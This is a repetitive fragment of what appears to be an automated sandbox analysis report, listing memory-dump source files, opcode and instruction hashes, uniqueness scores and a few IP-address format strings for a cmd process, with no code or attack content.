                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction ID: f90fdc3b2f26249b0075d359c74242cfef9568ebd91845c19424f59acc138fb4
                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                        • Instruction Fuzzy Hash: ACC04879B01A41CFCF15DB2AD694F8977E8FB48750F1908E0E859CBB21E724E911CA20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f6ae942e50ed5765fc279eae585614306a5b411488fa77ddea85574ccc66bba
                                                                        • Instruction ID: 0ee4581aed0c5e5b159c902dab93bc40eff5896130d966b0f6897a5db2b1fc07
                                                                        • Opcode Fuzzy Hash: 4f6ae942e50ed5765fc279eae585614306a5b411488fa77ddea85574ccc66bba
                                                                        • Instruction Fuzzy Hash: CF90023130140C43D104B2588904686000587D4301F55D011BA125655E976589917531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd2e9ed4dd9366c4bd03a80d6443dfab16be1374fa305f36a34ef8f5f3867739
                                                                        • Instruction ID: 633f08bbb646c207a977daff8139492dceda3d709d131d4f9e5d0de29af48514
                                                                        • Opcode Fuzzy Hash: cd2e9ed4dd9366c4bd03a80d6443dfab16be1374fa305f36a34ef8f5f3867739
                                                                        • Instruction Fuzzy Hash: A990023170540C43D150B2588514746000587D4301F55D011B4125654D87558B557AA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 651eae46779f9acbf14325ba8855e2c89b3e723a2e5ebdb7bf2e7c636a5a71de
                                                                        • Instruction ID: 41806f419eb96a902d2efdb239a1b805aae54c52ec8648739b3fbbffa068a8e9
                                                                        • Opcode Fuzzy Hash: 651eae46779f9acbf14325ba8855e2c89b3e723a2e5ebdb7bf2e7c636a5a71de
                                                                        • Instruction Fuzzy Hash: F490023130140C43D180B258850464A000587D5301F95D015B4126654DCB158B597BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5354173a42fde4046588b719190de4b504e3bbc101ed17b6ca7e2df98c3f295d
                                                                        • Instruction ID: bd83c4d1d5a15aea06165286627aa1d0d3ec1d7b5d0eb5a71f062354ed098360
                                                                        • Opcode Fuzzy Hash: 5354173a42fde4046588b719190de4b504e3bbc101ed17b6ca7e2df98c3f295d
                                                                        • Instruction Fuzzy Hash: 5290023130544C83D140B2588504A46001587D4305F55D011B4165694D97258E55BA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 492614d1faa00ea9ce0889c6f85434bf18bca2f8cecfa6f71c0651a97b4905ff
                                                                        • Instruction ID: bef474f13fc152b42c782acfb48291cfd1057a62366cc2b6be0a195cc1000b71
                                                                        • Opcode Fuzzy Hash: 492614d1faa00ea9ce0889c6f85434bf18bca2f8cecfa6f71c0651a97b4905ff
                                                                        • Instruction Fuzzy Hash: 829002A1301544D34500F358C504B0A450587E4201B55D016F5155560CC72589519535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%